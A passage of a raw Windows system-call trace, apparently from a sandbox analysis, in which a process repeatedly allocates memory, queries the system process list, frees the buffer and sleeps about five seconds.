BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.109] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.116] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.117] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.117] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.122] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.123] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.123] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.124] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.124] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.128] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.148] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.149] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.151] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.151] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.157] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.160] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.163] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.179] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.180] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.180] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.185] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.188] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.188] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.188] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.192] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.192] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.194] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.195] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.199] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.205] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.205] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.207] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.207] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.208] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.208] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.208] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.212] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.218] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.219] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.221] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.221] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.221] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.222] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.222] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.226] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.227] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.227] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.228] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.228] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.228] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.233] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.234] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.234] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.235] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.235] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.235] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.240] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.241] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.241] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.242] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.242] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.242] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.245] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.246] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.248] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.249] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.253] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.255] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.258] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.259] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.261] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.265] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.266] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.267] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.267] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0234.268] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0234.268] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0234.268] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0234.272] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0234.272] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0234.274] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0234.274] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 